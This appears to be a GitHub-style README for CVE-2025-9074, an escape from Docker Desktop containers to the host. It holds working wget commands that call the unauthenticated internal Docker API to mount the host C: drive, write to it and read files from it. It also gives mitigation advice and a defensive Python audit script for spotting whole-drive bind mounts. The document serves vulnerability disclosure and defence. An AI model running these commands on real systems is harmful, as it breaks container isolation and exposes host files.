# CVE-2025-9074 – Full Docker Escape on Windows & macOS Docker Desktop
## 📌 Description
A flaw in Docker Desktop’s internal HTTP API allowed containers to reach the service without authentication or access controls.
This enabled the creation of new containers with host volumes mounted, giving read/write access to the host file system.
## 📝 References
- [CVE-2025-9074 Record](https://www.cve.org/CVERecord?id=CVE-2025-9074)
- [Docker Desktop Release Notes](https://docs.docker.com/desktop/release-notes/#4443)
- [Felix Boulet’s Research](https://blog.qwertysecurity.com/Articles/blog3.html)
## 🎯 Affected Versions
- Docker Desktop **≤ 4.44.3** on Windows and macOS
## ⚙️ Proof of Concept (PoC)
### Requirements
- Docker Desktop prior to **4.44.3**
- A user account whose privileges cover the targeted host folder
### Steps to Reproduce
1. On Windows, create a `C:\test` folder with a sample file (e.g., `readme.txt`).

2. Launch a simple container (e.g., `alpine` using `docker run -it alpine '/bin/sh'`) and run:
```sh
# Create container with host volume mounted
wget --header='Content-Type: application/json' \
--post-data='{"Image":"alpine","Cmd":["sh","-c","echo pwned > /host_root/test/pwn.txt"],"HostConfig":{"Binds":["/mnt/host/c:/host_root"]}}' \
-O - http://192.168.65.7:2375/containers/create > create.json
# Extract container ID
cid=$(cut -d'"' -f4 create.json)
# Start container
wget --post-data='' -O - http://192.168.65.7:2375/containers/$cid/start
```
**Explanation**:
- The POST request creates a container mounting `C:\` into `/host_root`, then writes `pwn.txt`.
- The container ID is parsed from the response.
- A second POST request starts the container.
3. To read files, request an archive from the container:
```sh
wget http://192.168.65.7:2375/containers/$cid/archive?path=/host_root/test -O test.tar
tar -xvf test.tar
cat test/readme.txt
```
**Explanation**:
- The GET request fetches an archive of the host-mounted directory.
- Extracting it reveals host files accessible inside the container.
### Expected Result
1. `C:\test\pwn.txt` is created from within the container.

2. The container can read host files such as `C:\test\readme.txt`.

⚠️ **Note**: This PoC demonstrates the vulnerability safely and does not include weaponized exploit code.
## 🛡️ Mitigation
- Windows and macOS users should **upgrade** to Docker Desktop **≥ 4.44.3**
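Beyond upgrading, a defender can check whether any container on the host was created with a whole-drive bind, the mount the PoC payload uses. The audit script below is an added example, not part of the original PoC or of Docker's tooling; it assumes the JSON shape of `docker inspect` (`HostConfig.Binds`, `Mounts`) and treats `/host_mnt/` and `/run/desktop/mnt/host/` as assumed Docker Desktop drive prefixes alongside the `/mnt/host/` path from the PoC.

```python
"""Flag containers whose bind mounts expose the host file system (added example)."""
import json
import re
import sys

# Docker Desktop exposes host drives to its Linux VM under these prefixes.
# "/mnt/host/" is the path used in the PoC; the other two are assumed
# conventions and should be adjusted for the local installation.
DRIVE_MOUNT_PREFIXES = ("/mnt/host/", "/host_mnt/", "/run/desktop/mnt/host/")

def is_host_root_bind(source: str) -> bool:
    """True for '/', a Windows drive root ('C:\\'), or a whole mapped drive
    such as /mnt/host/c; /mnt/host/c/Users/alice is an ordinary project bind."""
    src = source.rstrip("/")
    if src == "" or re.fullmatch(r"[A-Za-z]:[\\/]?", source):
        return True
    for prefix in DRIVE_MOUNT_PREFIXES:
        rest = src[len(prefix):]
        if src.startswith(prefix) and rest and "/" not in rest:
            return True
    return False

def bind_source(bind: str) -> str:
    """Split 'source:target[:opts]'; the target is always an absolute Linux path."""
    m = re.match(r"^(.*?):(/.*)$", bind)
    return m.group(1) if m else bind

def find_host_root_containers(inspect_output):
    """Return (short id, name, offending source) for every risky bind mount."""
    findings = []
    for c in inspect_output:
        sources = {bind_source(b) for b in (c.get("HostConfig") or {}).get("Binds") or []}
        sources |= {m["Source"] for m in c.get("Mounts") or [] if m.get("Type") == "bind"}
        for s in sorted(sources):
            if is_host_root_bind(s):
                findings.append((c["Id"][:12], c.get("Name", "").lstrip("/"), s))
    return findings

# Constructed sample in the shape of `docker inspect`: a normal project bind and a
# container created like the PoC payload, mounting the whole C: drive.
SAMPLE_INSPECT = [
    {"Id": "1a2b3c4d5e6f" + "0" * 52, "Name": "/dev-shell",
     "HostConfig": {"Binds": ["/mnt/host/c/Users/alice/proj:/work"]}, "Mounts": []},
    {"Id": "f00dbabe0000" + "0" * 52, "Name": "/suspicious",
     "HostConfig": {"Binds": ["/mnt/host/c:/host_root"]},
     "Mounts": [{"Type": "bind", "Source": "/mnt/host/c", "Destination": "/host_root"}]},
]
if __name__ == "__main__":
    data = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_INSPECT
    for cid, name, src in find_host_root_containers(data):
        print(f"host-root bind: id={cid} name={name} source={src}")
```

Run it as `python audit.py inspect.json`, where `inspect.json` holds the output of `docker inspect $(docker ps -aq)`; without an argument it runs over the constructed sample.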
## ⚠️ Disclaimer
This PoC is for **educational and research purposes only**. The author assumes **no liability for misuse**.
---
## 🙏 Attribution
This PoC and README are **derived from research by [Felix Boulet](https://blog.qwertysecurity.com/Articles/blog3.html)**.
All credit for the original discovery and analysis belongs to the original author.
---
## 📜 License
This project is licensed under the [MIT License](LICENSE).